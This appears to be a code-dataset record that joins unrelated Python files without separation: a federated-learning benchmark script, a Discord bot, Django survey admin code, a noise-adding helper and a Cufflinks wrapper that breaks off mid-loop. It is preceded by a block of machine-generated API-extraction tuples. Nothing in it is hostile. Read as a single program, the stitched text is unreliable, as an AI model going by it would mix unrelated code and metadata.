'import numpy as np\n'), ((10130, 10155), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (10153, 10155), False, 'import argparse\n'), ((10487, 10526), 'os.path.join', 'os.path.join', (['args.dataset_path', '"""test"""'], {}), "(args.dataset_path, 'test')\n", (10499, 10526), False, 'import os\n'), ((283, 298), 'numpy.sin', 'np.sin', (['rot_rad'], {}), '(rot_rad)\n', (289, 298), True, 'import numpy as np\n'), ((300, 315), 'numpy.cos', 'np.cos', (['rot_rad'], {}), '(rot_rad)\n', (306, 315), True, 'import numpy as np\n'), ((816, 860), 'numpy.array', 'np.array', (['[0, src_h * 0.5]'], {'dtype': 'np.float32'}), '([0, src_h * 0.5], dtype=np.float32)\n', (824, 860), True, 'import numpy as np\n'), ((900, 944), 'numpy.array', 'np.array', (['[src_w * 0.5, 0]'], {'dtype': 'np.float32'}), '([src_w * 0.5, 0], dtype=np.float32)\n', (908, 944), True, 'import numpy as np\n'), ((2427, 2448), 'os.path.isfile', 'os.path.isfile', (['image'], {}), '(image)\n', (2441, 2448), False, 'import os\n'), ((10538, 10561), 'os.path.isdir', 'os.path.isdir', (['out_path'], {}), '(out_path)\n', (10551, 10561), False, 'import os\n'), ((1564, 1579), 'numpy.float32', 'np.float32', (['dst'], {}), '(dst)\n', (1574, 1579), True, 'import numpy as np\n'), ((1581, 1596), 'numpy.float32', 'np.float32', (['src'], {}), '(src)\n', (1591, 1596), True, 'import numpy as np\n'), ((1647, 1662), 'numpy.float32', 'np.float32', (['src'], {}), '(src)\n', (1657, 1662), True, 'import numpy as np\n'), ((1664, 1679), 'numpy.float32', 'np.float32', (['dst'], {}), '(dst)\n', (1674, 1679), True, 'import numpy as np\n'), ((3152, 3197), 'models.smpl_official.SMPL', 'SMPL', (['paths.SMPL'], {'batch_size': '(1)', 'gender': '"""male"""'}), "(paths.SMPL, batch_size=1, gender='male')\n", (3156, 3197), False, 'from models.smpl_official import SMPL\n'), ((3227, 3274), 'models.smpl_official.SMPL', 'SMPL', (['paths.SMPL'], {'batch_size': '(1)', 'gender': '"""female"""'}), "(paths.SMPL, batch_size=1, gender='female')\n", (3231, 3274), False, 'from models.smpl_official import SMPL\n'), ((3476, 3530), 'os.path.join', 'os.path.join', (['dataset_path', '"""sequenceFiles"""', '"""test"""', 'f'], {}), "(dataset_path, 'sequenceFiles', 'test', f)\n", (3488, 3530), False, 'import os\n'), ((3816, 3849), 'pickle.load', 'pickle.load', (['f'], {'encoding': '"""latin1"""'}), "(f, encoding='latin1')\n", (3827, 3849), False, 'import pickle\n'), ((5231, 5247), 'numpy.sum', 'np.sum', (['valid[0]'], {}), '(valid[0])\n', (5237, 5247), True, 'import numpy as np\n'), ((5249, 5266), 'numpy.sum', 'np.sum', (['valid[-1]'], {}), '(valid[-1])\n', (5255, 5266), True, 'import numpy as np\n'), ((10392, 10417), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (10415, 10417), False, 'import torch\n'), ((10583, 10623), 'os.path.join', 'os.path.join', (['out_path', '"""cropped_frames"""'], {}), "(out_path, 'cropped_frames')\n", (10595, 10623), False, 'import os\n'), ((2483, 2500), 'cv2.imread', 'cv2.imread', (['image'], {}), '(image)\n', (2493, 2500), False, 'import cv2\n'), ((3580, 3631), 'os.path.join', 'os.path.join', (['dataset_path', '"""sequenceFiles"""', '"""test"""'], {}), "(dataset_path, 'sequenceFiles', 'test')\n", (3592, 3631), False, 'import os\n'), ((7327, 7389), 'utils.cam_utils.perspective_project_torch', 'perspective_project_torch', (['vertices', 'cam_R', 'cam_t'], {'cam_K': 'cam_K'}), '(vertices, cam_R, cam_t, cam_K=cam_K)\n', (7352, 7389), False, 'from utils.cam_utils import perspective_project_torch\n'), ((8324, 8347), 'cv2.imread', 'cv2.imread', (['image_fpath'], {}), '(image_fpath)\n', (8334, 8347), False, 'import cv2\n'), ((8909, 8970), 'os.path.join', 'os.path.join', (['out_path', '"""cropped_frames"""', 'cropped_image_fname'], {}), "(out_path, 'cropped_frames', cropped_image_fname)\n", (8921, 8970), False, 'import os\n'), ((9046, 9093), 'cv2.imwrite', 'cv2.imwrite', (['cropped_image_fpath', 'cropped_image'], {}), '(cropped_image_fpath, cropped_image)\n', (9057, 9093), False, 'import cv2\n'), ((5430, 5462), 'torch.from_numpy', 'torch.from_numpy', (['cam_K[None, :]'], {}), '(cam_K[None, :])\n', (5446, 5462), False, 'import torch\n'), ((5717, 5749), 'torch.from_numpy', 'torch.from_numpy', (['shape[None, :]'], {}), '(shape[None, :])\n', (5733, 5749), False, 'import torch\n'), ((6299, 6330), 'torch.from_numpy', 'torch.from_numpy', (['pose[None, :]'], {}), '(pose[None, :])\n', (6315, 6330), False, 'import torch\n'), ((6378, 6410), 'torch.from_numpy', 'torch.from_numpy', (['cam_t[None, :]'], {}), '(cam_t[None, :])\n', (6394, 6410), False, 'import torch\n'), ((6458, 6493), 'torch.from_numpy', 'torch.from_numpy', (['cam_R[None, :, :]'], {}), '(cam_R[None, :, :])\n', (6474, 6493), False, 'import torch\n'), ((6547, 6585), 'torch.from_numpy', 'torch.from_numpy', (['frame_trans[None, :]'], {}), '(frame_trans[None, :])\n', (6563, 6585), False, 'import torch\n'), ((9352, 9375), 'cv2.Rodrigues', 'cv2.Rodrigues', (['pose[:3]'], {}), '(pose[:3])\n', (9365, 9375), False, 'import cv2\n')] |
# @Author : FederalLab
# @Date : 2021-09-26 11:03:42
# @Last Modified by : <NAME>
# @Last Modified time: 2021-09-26 11:03:42
# Copyright (c) FederalLab. All rights reserved.
import argparse
import json
import os
import time
import openfed
import torch
from torch.utils.data import DataLoader
from benchmark.datasets import build_dataset
from benchmark.models import build_model
from benchmark.tasks import Tester, Trainer
from benchmark.utils import StoreDict, meta_reduce_log
parser = argparse.ArgumentParser('benchmark-lightly')
# task
parser.add_argument('--task',
type=str,
default='mnist',
choices=[
'celeba', 'cifar100', 'femnist', 'mnist', 'reddit',
'sent140', 'shakespeare', 'stackoverflow', 'synthetic'
])
parser.add_argument('--network_args',
nargs='+',
action=StoreDict,
default=dict(),
help='extra network args passed in.')
# dataset
parser.add_argument('--data_root',
type=str,
default='benchmark/datasets/mnist/data',
help='The folder contains all datasets.')
parser.add_argument('--partition',
type=str,
default='iid',
choices=['iid', 'dirichlet', 'power-law'],
help='How to split the dataset into different parts.'
'Only be used with not federated dataset, such as mnist.')
parser.add_argument('--partition_args',
nargs='+',
action=StoreDict,
default=dict(),
help='extra partition args passed in.')
parser.add_argument('--num_parts',
type=int,
default=100,
help='The number of the parts to split into.')
parser.add_argument('--tst_num_parts',
type=int,
default=-1,
help='The number of the parts to split into.')
parser.add_argument('--dataset_args',
nargs='+',
action=StoreDict,
default=dict(),
help='extra dataset args passed in.')
# train
parser.add_argument('--epochs',
type=int,
default=1,
help='The epochs trained on local client.')
parser.add_argument('--rounds',
type=int,
default=10,
help='The total rounds for federated training.')
parser.add_argument('--act_clts',
'--activated_clients',
type=int,
default=10,
help='The number of parts used to train at each round.')
parser.add_argument(
'--act_clts_rat',
'--activated_clients_ratio',
type=float,
default=1.0,
help='The portion of parts used to train at each time, in [0, 1].')
parser.add_argument('--tst_act_clts',
'--test_activated_clients',
type=int,
default=10,
help='The number of parts used to test at each round.'
'If not specified, use full test dataset.')
parser.add_argument(
'--tst_act_clts_rat',
'--test_activated_clients_ratio',
type=float,
default=1.0,
help='The portion of parts used to train at each time, in [0, 1].')
parser.add_argument(
'--max_acg_step',
type=int,
default=-1,
help='The number of samples used to compute acg. -1 used all train data.')
parser.add_argument(
'--optim',
type=str,
default='fedavg',
choices=['fedavg', 'fedsgd', 'fedela', 'fedprox', 'scaffold'],
help='Specify fed optimizer.')
parser.add_argument('--optim_args',
nargs='+',
action=StoreDict,
default=dict(),
help='extra optim args passed in.')
parser.add_argument('--co_lr',
'--collaborator_lr',
type=float,
default=1e-2,
help='The learning rate of collaborator optimizer.')
parser.add_argument('--ag_lr',
'--aggregator_lr',
type=float,
default=1.0,
help='The learning rate of aggregator optimizer.')
parser.add_argument('--bz',
'--batch_size',
type=int,
default=10,
help='The batch size.')
parser.add_argument('--gpu',
action='store_true',
default=False,
help='Whether to use gpu.')
# log
parser.add_argument('--log_dir',
type=str,
default='logs/',
help='The dir to log train and test information.')
parser.add_argument('--seed', type=int, default=0, help='Seed for everything.')
# props
parser.add_argument('--props', type=str, default='/tmp/aggregator.json')
args = parser.parse_args()
args.exp_name = args.optim + '_' + (args.partition
if args.task == 'mnist' else '')
print('>>> Load Props')
props = openfed.federated.FederatedProperties.load(args.props)
assert len(props) == 1
props = props[0]
print(props)
args.tst_num_parts = args.tst_num_parts if args.tst_num_parts > 0 \
else props.address.world_size - 1
print('>>> Seed everything...')
openfed.utils.seed_everything(args.seed)
print('>>> Log argparse to json...')
args.log_dir = os.path.join(args.log_dir, args.task, args.exp_name)
os.makedirs(args.log_dir, exist_ok=True)
if props.aggregator:
with open(os.path.join(args.log_dir, 'config.json'), 'w') as f:
json.dump(args.__dict__, f)
print('>>> Config device...')
if args.gpu and torch.cuda.is_available():
args.gpu = args.fed_rank % torch.cuda.device_count()
args.device = torch.device(args.gpu)
torch.cuda.set_device(args.gpu)
else:
args.device = torch.device('cpu')
print(args.__dict__)
print(f"\tLet's use {args.device}.")
print('>>> Load dataset...')
if args.task == 'mnist':
if args.partition == 'iid':
partitioner = openfed.data.IIDPartitioner()
elif args.partition == 'dirichlet':
partitioner = openfed.data.DirichletPartitioner(**args.partition_args)
elif args.partition == 'power-law':
partitioner = openfed.data.PowerLawPartitioner(**args.partition_args)
else:
raise NotImplementedError
train_args = dict(total_parts=args.num_parts, partitioner=partitioner)
test_args = dict(
total_parts=args.tst_num_parts,
partitioner=partitioner,
)
elif args.task == 'reddit':
train_args = dict(mode='train')
test_args = dict(mode='test')
else:
train_args = dict(train=True)
test_args = dict(train=False)
train_dataset = build_dataset(args.task,
root=args.data_root,
**train_args,
**args.dataset_args)
test_dataset = build_dataset(args.task,
root=args.data_root,
**test_args,
**args.dataset_args)
print(train_dataset)
print(test_dataset)
print('>>> Load dataLoader...')
train_dataloader = DataLoader(train_dataset,
batch_size=args.bz,
shuffle=True,
num_workers=0,
drop_last=False)
test_dataloader = DataLoader(test_dataset,
batch_size=args.bz,
shuffle=False,
num_workers=0,
drop_last=False)
print('>>> Build network...')
network = build_model(args.task, **args.network_args)
print(network)
print('>>> Move to device...')
network = network.to(args.device)
print('>>> Federated Optimizer...')
if args.optim == 'fedavg':
optim = torch.optim.SGD(network.parameters(),
lr=args.ag_lr if props.aggregator else args.co_lr)
fed_optim = openfed.optim.FederatedOptimizer(optim, role=props.role)
aggregator = openfed.functional.naive_aggregation
aggregator_kwargs = {}
elif args.optim == 'fedela':
optim = torch.optim.SGD(network.parameters(),
lr=args.ag_lr if props.aggregator else args.co_lr)
fed_optim = openfed.optim.ElasticOptimizer(optim, role=props.role)
aggregator = openfed.functional.elastic_aggregation
aggregator_kwargs = {'quantile': 0.5}
elif args.optim == 'fedsgd':
optim = torch.optim.SGD(network.parameters(),
lr=args.ag_lr if props.aggregator else args.co_lr)
fed_optim = openfed.optim.FederatedOptimizer(optim, role=props.role)
aggregator = openfed.functional.average_aggregation
aggregator_kwargs = {}
elif args.optim == 'fedprox':
optim = torch.optim.SGD(network.parameters(),
lr=args.ag_lr if props.aggregator else args.co_lr)
fed_optim = openfed.optim.ProxOptimizer(optim, role=props.role)
aggregator = openfed.functional.naive_aggregation
aggregator_kwargs = {}
elif args.optim == 'scaffold':
optim = torch.optim.SGD(network.parameters(),
lr=args.ag_lr if props.aggregator else args.co_lr)
fed_optim = openfed.optim.ScaffoldOptimizer(optim, role=props.role)
aggregator = openfed.functional.naive_aggregation
aggregator_kwargs = {}
else:
raise NotImplementedError(f'{args.optim} is not implemented.')
print('>>> Lr Scheduler...')
lr_scheduler = \
torch.optim.lr_scheduler.CosineAnnealingLR(optim, T_max=args.rounds)
print('>>> Maintainer...')
maintainer = openfed.core.Maintainer(props, network.state_dict(keep_vars=True))
print('>>> Register hooks...')
parts_list = list(range(train_dataset.total_parts))
act_clts = args.act_clts if args.act_clts > 0 else\
int(len(parts_list) * args.act_clts_rat)
assert act_clts <= len(parts_list)
tst_parts_list = list(range(test_dataset.total_parts))
tst_act_clts = args.tst_act_clts if args.tst_act_clts > 0 else\
int(len(tst_parts_list) * args.tst_act_clts_rat)
assert tst_act_clts <= len(tst_parts_list)
print(f'\tTrain Part: {len(parts_list)}')
print(f'\tActivated Train Part: {act_clts}')
print(f'\tTest Part: {len(tst_parts_list)}')
print(f'\tActivated Test Part: {tst_act_clts}')
with maintainer:
openfed.functional.device_alignment()
openfed.functional.dispatch_step(counts=[act_clts, tst_act_clts],
parts_list=dict(
train=parts_list,
test=tst_parts_list,
))
def step():
# build a trainer and tester
trainer = Trainer(maintainer,
network,
fed_optim,
train_dataloader,
cache_folder=f'/tmp/{args.task}/{args.exp_name}')
tester = Tester(maintainer, network, test_dataloader)
task_info = openfed.Meta()
while True:
while not maintainer.step(upload=False, meta=task_info):
time.sleep(1.0)
if maintainer.is_offline:
break
if maintainer.is_offline:
break
if task_info.mode == 'train': # type: ignore
trainer.start_training(task_info)
lr_scheduler.last_epoch = task_info.version # type: ignore
lr_scheduler.step()
duration_acg = trainer.acg_epoch(max_acg_step=args.max_acg_step)
acc, loss, duration = trainer.train_epoch(epoch=args.epochs)
train_info = dict(
accuracy=acc,
loss=loss,
duration=duration,
duration_acg=duration_acg,
version=task_info.version, # type: ignore
instances=len(trainer.dataloader.dataset), # type: ignore
)
task_info.update(train_info)
trainer.finish_training(task_info)
else:
tester.start_testing(task_info)
acc, loss, duration = tester.test_epoch()
test_info = dict(
accuracy=acc,
loss=loss,
duration=duration,
version=task_info.version, # type: ignore
instances=len(tester.dataloader.dataset), # type: ignore
)
task_info.update(test_info)
tester.finish_testing(task_info)
if maintainer.aggregator:
result_path = os.path.join(args.log_dir, f'{args.task}.json')
with open(result_path, 'w') as f:
# clear last result
f.write('')
openfed_api = openfed.API(maintainer,
fed_optim,
rounds=args.rounds,
agg_func=aggregator,
agg_func_kwargs=aggregator_kwargs,
reduce_func=meta_reduce_log,
reduce_func_kwargs=dict(log_dir=result_path),
with_test_round=True)
openfed_api.start()
openfed_api.join()
maintainer.killed()
else:
step()
| [
"torch.cuda.device_count",
"time.sleep",
"torch.cuda.is_available",
"openfed.Meta",
"openfed.utils.seed_everything",
"argparse.ArgumentParser",
"openfed.data.DirichletPartitioner",
"openfed.optim.ScaffoldOptimizer",
"openfed.optim.FederatedOptimizer",
"openfed.federated.FederatedProperties.load",
... | [((514, 558), 'argparse.ArgumentParser', 'argparse.ArgumentParser', (['"""benchmark-lightly"""'], {}), "('benchmark-lightly')\n", (537, 558), False, 'import argparse\n'), ((5314, 5368), 'openfed.federated.FederatedProperties.load', 'openfed.federated.FederatedProperties.load', (['args.props'], {}), '(args.props)\n', (5356, 5368), False, 'import openfed\n'), ((5562, 5602), 'openfed.utils.seed_everything', 'openfed.utils.seed_everything', (['args.seed'], {}), '(args.seed)\n', (5591, 5602), False, 'import openfed\n'), ((5656, 5708), 'os.path.join', 'os.path.join', (['args.log_dir', 'args.task', 'args.exp_name'], {}), '(args.log_dir, args.task, args.exp_name)\n', (5668, 5708), False, 'import os\n'), ((5710, 5750), 'os.makedirs', 'os.makedirs', (['args.log_dir'], {'exist_ok': '(True)'}), '(args.log_dir, exist_ok=True)\n', (5721, 5750), False, 'import os\n'), ((6974, 7059), 'benchmark.datasets.build_dataset', 'build_dataset', (['args.task'], {'root': 'args.data_root'}), '(args.task, root=args.data_root, **train_args, **args.dataset_args\n )\n', (6987, 7059), False, 'from benchmark.datasets import build_dataset\n'), ((7160, 7239), 'benchmark.datasets.build_dataset', 'build_dataset', (['args.task'], {'root': 'args.data_root'}), '(args.task, root=args.data_root, **test_args, **args.dataset_args)\n', (7173, 7239), False, 'from benchmark.datasets import build_dataset\n'), ((7421, 7516), 'torch.utils.data.DataLoader', 'DataLoader', (['train_dataset'], {'batch_size': 'args.bz', 'shuffle': '(True)', 'num_workers': '(0)', 'drop_last': '(False)'}), '(train_dataset, batch_size=args.bz, shuffle=True, num_workers=0,\n drop_last=False)\n', (7431, 7516), False, 'from torch.utils.data import DataLoader\n'), ((7651, 7746), 'torch.utils.data.DataLoader', 'DataLoader', (['test_dataset'], {'batch_size': 'args.bz', 'shuffle': '(False)', 'num_workers': '(0)', 'drop_last': '(False)'}), '(test_dataset, batch_size=args.bz, shuffle=False, num_workers=0,\n drop_last=False)\n', (7661, 7746), False, 'from torch.utils.data import DataLoader\n'), ((7900, 7943), 'benchmark.models.build_model', 'build_model', (['args.task'], {}), '(args.task, **args.network_args)\n', (7911, 7943), False, 'from benchmark.models import build_model\n'), ((9758, 9826), 'torch.optim.lr_scheduler.CosineAnnealingLR', 'torch.optim.lr_scheduler.CosineAnnealingLR', (['optim'], {'T_max': 'args.rounds'}), '(optim, T_max=args.rounds)\n', (9800, 9826), False, 'import torch\n'), ((5923, 5948), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (5946, 5948), False, 'import torch\n'), ((6025, 6047), 'torch.device', 'torch.device', (['args.gpu'], {}), '(args.gpu)\n', (6037, 6047), False, 'import torch\n'), ((6052, 6083), 'torch.cuda.set_device', 'torch.cuda.set_device', (['args.gpu'], {}), '(args.gpu)\n', (6073, 6083), False, 'import torch\n'), ((6108, 6127), 'torch.device', 'torch.device', (['"""cpu"""'], {}), "('cpu')\n", (6120, 6127), False, 'import torch\n'), ((8234, 8290), 'openfed.optim.FederatedOptimizer', 'openfed.optim.FederatedOptimizer', (['optim'], {'role': 'props.role'}), '(optim, role=props.role)\n', (8266, 8290), False, 'import openfed\n'), ((10569, 10606), 'openfed.functional.device_alignment', 'openfed.functional.device_alignment', ([], {}), '()\n', (10604, 10606), False, 'import openfed\n'), ((10953, 11065), 'benchmark.tasks.Trainer', 'Trainer', (['maintainer', 'network', 'fed_optim', 'train_dataloader'], {'cache_folder': 'f"""/tmp/{args.task}/{args.exp_name}"""'}), "(maintainer, network, fed_optim, train_dataloader, cache_folder=\n f'/tmp/{args.task}/{args.exp_name}')\n", (10960, 11065), False, 'from benchmark.tasks import Tester, Trainer\n'), ((11162, 11206), 'benchmark.tasks.Tester', 'Tester', (['maintainer', 'network', 'test_dataloader'], {}), '(maintainer, network, test_dataloader)\n', (11168, 11206), False, 'from benchmark.tasks import Tester, Trainer\n'), ((11223, 11237), 'openfed.Meta', 'openfed.Meta', ([], {}), '()\n', (11235, 11237), False, 'import openfed\n'), ((12735, 12782), 'os.path.join', 'os.path.join', (['args.log_dir', 'f"""{args.task}.json"""'], {}), "(args.log_dir, f'{args.task}.json')\n", (12747, 12782), False, 'import os\n'), ((5848, 5875), 'json.dump', 'json.dump', (['args.__dict__', 'f'], {}), '(args.__dict__, f)\n', (5857, 5875), False, 'import json\n'), ((5981, 6006), 'torch.cuda.device_count', 'torch.cuda.device_count', ([], {}), '()\n', (6004, 6006), False, 'import torch\n'), ((6298, 6327), 'openfed.data.IIDPartitioner', 'openfed.data.IIDPartitioner', ([], {}), '()\n', (6325, 6327), False, 'import openfed\n'), ((8546, 8600), 'openfed.optim.ElasticOptimizer', 'openfed.optim.ElasticOptimizer', (['optim'], {'role': 'props.role'}), '(optim, role=props.role)\n', (8576, 8600), False, 'import openfed\n'), ((5786, 5827), 'os.path.join', 'os.path.join', (['args.log_dir', '"""config.json"""'], {}), "(args.log_dir, 'config.json')\n", (5798, 5827), False, 'import os\n'), ((6390, 6446), 'openfed.data.DirichletPartitioner', 'openfed.data.DirichletPartitioner', ([], {}), '(**args.partition_args)\n', (6423, 6446), False, 'import openfed\n'), ((8873, 8929), 'openfed.optim.FederatedOptimizer', 'openfed.optim.FederatedOptimizer', (['optim'], {'role': 'props.role'}), '(optim, role=props.role)\n', (8905, 8929), False, 'import openfed\n'), ((11332, 11347), 'time.sleep', 'time.sleep', (['(1.0)'], {}), '(1.0)\n', (11342, 11347), False, 'import time\n'), ((6509, 6564), 'openfed.data.PowerLawPartitioner', 'openfed.data.PowerLawPartitioner', ([], {}), '(**args.partition_args)\n', (6541, 6564), False, 'import openfed\n'), ((9188, 9239), 'openfed.optim.ProxOptimizer', 'openfed.optim.ProxOptimizer', (['optim'], {'role': 'props.role'}), '(optim, role=props.role)\n', (9215, 9239), False, 'import openfed\n'), ((9497, 9552), 'openfed.optim.ScaffoldOptimizer', 'openfed.optim.ScaffoldOptimizer', (['optim'], {'role': 'props.role'}), '(optim, role=props.role)\n', (9528, 9552), False, 'import openfed\n')] |
import os
import asyncio
import logging
from contextlib import suppress
import discord
from discord.ext import commands
import aiohttp
import config
from cogs.utils.database import Database
log = logging.getLogger("discord")
log.setLevel(logging.WARNING)
handler = logging.FileHandler(filename="discord.log", encoding="utf-8", mode="a")
handler.setFormatter(
logging.Formatter(
'{"message": "%(message)s", "level": "%(levelname)s", "time": "%(asctime)s"}'
)
)
log.addHandler(handler)
class Bot(commands.Bot):
"""A subclass of discord.ext.commands.Bot."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.client_session = None
self.DB = Database()
@classmethod
def create(cls) -> commands.Bot:
"""Create and return an instance of a Bot."""
loop = asyncio.get_event_loop()
intents = discord.Intents.all()
intents.dm_typing = False
intents.webhooks = False
intents.integrations = False
return cls(
loop=loop,
command_prefix=commands.when_mentioned_or("."),
activity=discord.Game(name="Tax Evasion Simulator"),
case_insensitive=True,
allowed_mentions=discord.AllowedMentions(everyone=False),
intents=intents,
owner_ids=(225708387558490112,),
)
def load_extensions(self) -> None:
"""Load all extensions."""
for extension in [f.name[:-3] for f in os.scandir("cogs") if f.is_file()]:
try:
self.load_extension(f"cogs.{extension}")
except Exception as e:
print(f"Failed to load extension {extension}.\n{e} \n")
async def get_json(self, url):
"""Gets and loads json from a url.
session: aiohttp.ClientSession
A aiohttp client session so that a new one isn't made every request
url: str
The url to fetch the json from.
"""
try:
async with self.client_session.get(url) as response:
return await response.json()
except (
asyncio.exceptions.TimeoutError,
aiohttp.client_exceptions.ContentTypeError,
):
return None
async def close(self) -> None:
"""Close the Discord connection and the aiohttp session."""
for ext in list(self.extensions):
with suppress(Exception):
self.unload_extension(ext)
for cog in list(self.cogs):
with suppress(Exception):
self.remove_cog(cog)
await super().close()
if self.client_session:
await self.client_session.close()
async def login(self, *args, **kwargs) -> None:
"""Setup the client_session before logging in."""
self.client_session = aiohttp.ClientSession(
timeout=aiohttp.ClientTimeout(total=6)
)
await super().login(*args, **kwargs)
if __name__ == "__main__":
bot = Bot.create()
bot.load_extensions()
bot.run(config.token)
| [
"logging.getLogger",
"discord.ext.commands.when_mentioned_or",
"discord.AllowedMentions",
"discord.Game",
"logging.Formatter",
"os.scandir",
"cogs.utils.database.Database",
"discord.Intents.all",
"aiohttp.ClientTimeout",
"logging.FileHandler",
"contextlib.suppress",
"asyncio.get_event_loop"
] | [((213, 241), 'logging.getLogger', 'logging.getLogger', (['"""discord"""'], {}), "('discord')\n", (230, 241), False, 'import logging\n'), ((286, 357), 'logging.FileHandler', 'logging.FileHandler', ([], {'filename': '"""discord.log"""', 'encoding': '"""utf-8"""', 'mode': '"""a"""'}), "(filename='discord.log', encoding='utf-8', mode='a')\n", (305, 357), False, 'import logging\n'), ((388, 494), 'logging.Formatter', 'logging.Formatter', (['"""{"message": "%(message)s", "level": "%(levelname)s", "time": "%(asctime)s"}"""'], {}), '(\n \'{"message": "%(message)s", "level": "%(levelname)s", "time": "%(asctime)s"}\'\n )\n', (405, 494), False, 'import logging\n'), ((756, 766), 'cogs.utils.database.Database', 'Database', ([], {}), '()\n', (764, 766), False, 'from cogs.utils.database import Database\n'), ((896, 920), 'asyncio.get_event_loop', 'asyncio.get_event_loop', ([], {}), '()\n', (918, 920), False, 'import asyncio\n'), ((942, 963), 'discord.Intents.all', 'discord.Intents.all', ([], {}), '()\n', (961, 963), False, 'import discord\n'), ((1146, 1177), 'discord.ext.commands.when_mentioned_or', 'commands.when_mentioned_or', (['"""."""'], {}), "('.')\n", (1172, 1177), False, 'from discord.ext import commands\n'), ((1201, 1243), 'discord.Game', 'discord.Game', ([], {'name': '"""Tax Evasion Simulator"""'}), "(name='Tax Evasion Simulator')\n", (1213, 1243), False, 'import discord\n'), ((1311, 1350), 'discord.AllowedMentions', 'discord.AllowedMentions', ([], {'everyone': '(False)'}), '(everyone=False)\n', (1334, 1350), False, 'import discord\n'), ((1565, 1583), 'os.scandir', 'os.scandir', (['"""cogs"""'], {}), "('cogs')\n", (1575, 1583), False, 'import os\n'), ((2519, 2538), 'contextlib.suppress', 'suppress', (['Exception'], {}), '(Exception)\n', (2527, 2538), False, 'from contextlib import suppress\n'), ((2641, 2660), 'contextlib.suppress', 'suppress', (['Exception'], {}), '(Exception)\n', (2649, 2660), False, 'from contextlib import suppress\n'), ((3004, 3034), 'aiohttp.ClientTimeout', 'aiohttp.ClientTimeout', ([], {'total': '(6)'}), '(total=6)\n', (3025, 3034), False, 'import aiohttp\n')] |
from django.contrib import admin
from django.contrib.contenttypes.admin import GenericTabularInline
from .models import (Response, Survey, Question,
Answer, Report, Attachment, MapNode)
from import_export.admin import ImportExportActionModelAdmin
class QuestionInline(admin.TabularInline):
model = Question
ordering = ("order",)
extra = 1
class AttachmentInline(GenericTabularInline):
model = Attachment
extra = 1
ct_fk_field = 'object_id'
ct_field = 'content_type'
@admin.register(Survey)
class SurveyAdmin(ImportExportActionModelAdmin):
list_display = ("name",)
inlines = [QuestionInline]
class AnswerBaseInline(admin.StackedInline):
fields = ("question", "body")
readonly_fields = ("question",)
extra = 0
model = Answer
@admin.register(Response)
class ResponseAdmin(ImportExportActionModelAdmin):
list_display = ("id", "survey", "created", "user")
list_filter = ("survey", "created", "user")
date_hierarchy = "created"
inlines = [AttachmentInline, AnswerBaseInline]
readonly_fields = ("survey", "created", "updated", "user")
@admin.register(Report)
class ReportAdmin(ImportExportActionModelAdmin):
list_display = ("name", "date_from", "date_to")
filter_horizontal = ("checklists",)
@admin.register(Attachment)
class AttachmentAdmin(admin.ModelAdmin):
list_display = ("name", 'description', 'timestamp', 'file')
@admin.register(MapNode)
class MapNodeAdmin(admin.ModelAdmin):
pass
@admin.register(Question)
class QuestionAdmin(admin.ModelAdmin):
list_filter = ("survey",)
| [
"django.contrib.admin.register"
] | [((523, 545), 'django.contrib.admin.register', 'admin.register', (['Survey'], {}), '(Survey)\n', (537, 545), False, 'from django.contrib import admin\n'), ((808, 832), 'django.contrib.admin.register', 'admin.register', (['Response'], {}), '(Response)\n', (822, 832), False, 'from django.contrib import admin\n'), ((1135, 1157), 'django.contrib.admin.register', 'admin.register', (['Report'], {}), '(Report)\n', (1149, 1157), False, 'from django.contrib import admin\n'), ((1302, 1328), 'django.contrib.admin.register', 'admin.register', (['Attachment'], {}), '(Attachment)\n', (1316, 1328), False, 'from django.contrib import admin\n'), ((1437, 1460), 'django.contrib.admin.register', 'admin.register', (['MapNode'], {}), '(MapNode)\n', (1451, 1460), False, 'from django.contrib import admin\n'), ((1511, 1535), 'django.contrib.admin.register', 'admin.register', (['Question'], {}), '(Question)\n', (1525, 1535), False, 'from django.contrib import admin\n')] |
# -*- coding: utf-8 -*-
"""
Created on Sat Jul 6 10:59:16 2019
@author: WEIKANG
"""
import numpy as np
import copy
# import torch
import random
# from Calculate import get_1_norm#, get_2_norm, inner_product, avg_grads
def noise_add(noise_scale, w):
w_noise = copy.deepcopy(w)
if isinstance(w[0], np.ndarray) == True:
noise = np.random.normal(0, noise_scale, w.size())
w_noise = w_noise + noise
else:
for k in range(len(w)):
for i in w[k].keys():
noise = np.random.normal(0, noise_scale, w[k][i].size())
'''if args.gpu != -1:
noise = torch.from_numpy(noise).float().cuda()
else:
noise = torch.from_numpy(noise).float()'''
w_noise[k][i] = w_noise[k][i] + noise
return w_noise
def users_sampling(args, w, chosenUsers):
if args.num_chosenUsers < args.num_users:
w_locals = []
for i in range(len(chosenUsers)):
w_locals.append(w[chosenUsers[i]])
else:
w_locals = copy.deepcopy(w)
return w_locals
'''def clipping(args, w):
if get_1_norm(w) > args.clipthr:
w_local = copy.deepcopy(w)
for i in w.keys():
w_local[i]=copy.deepcopy(w[i]*args.clipthr/get_1_norm(w))
else:
w_local = copy.deepcopy(w)
return w_local'''
| [
"copy.deepcopy"
] | [((269, 285), 'copy.deepcopy', 'copy.deepcopy', (['w'], {}), '(w)\n', (282, 285), False, 'import copy\n'), ((1063, 1079), 'copy.deepcopy', 'copy.deepcopy', (['w'], {}), '(w)\n', (1076, 1079), False, 'import copy\n')] |
#!/usr/bin/env python
# _*_ coding: utf-8 _*_
# @author: Drizzle_Zhang
# @file: cufflinks.py
# @time: 2018/10/24 20:14
from time import time
from argparse import ArgumentParser
import os
import subprocess
def cufflinks(bam_path, cufflinks_out, process=3, thread=10):
# read samples from results of tophat
samples = os.listdir(bam_path)
list_srr = []
for sample in samples:
if sample[:3] == 'SRR' and os.path.isdir(os.path.join(bam_path, sample)):
list_srr.append(sample)
# run cufflinks
subprocesses = []
for i in range(len(list_srr)):
if i % process == 0:
for sub in subprocesses:
sub.wait()
subprocesses = []
subprocesses.append(subprocess.Popen("cufflinks -p " + str(thread) +
" -o " + os.path.join(cufflinks_out, list_srr[i]) + ' '
+ os.path.join(os.path.join(bam_path, list_srr[i]), 'accepted_hits.bam'),
shell=True))
return
def cuffmerge(cufflinks_path, cuffmerge_path, gtf_file, fasta_file, thread=20):
# build assembiles.txt
samples = os.listdir(cufflinks_path)
with open(os.path.join(cufflinks_path, 'assemblies.txt'), 'w') as w_asm:
for sample in samples:
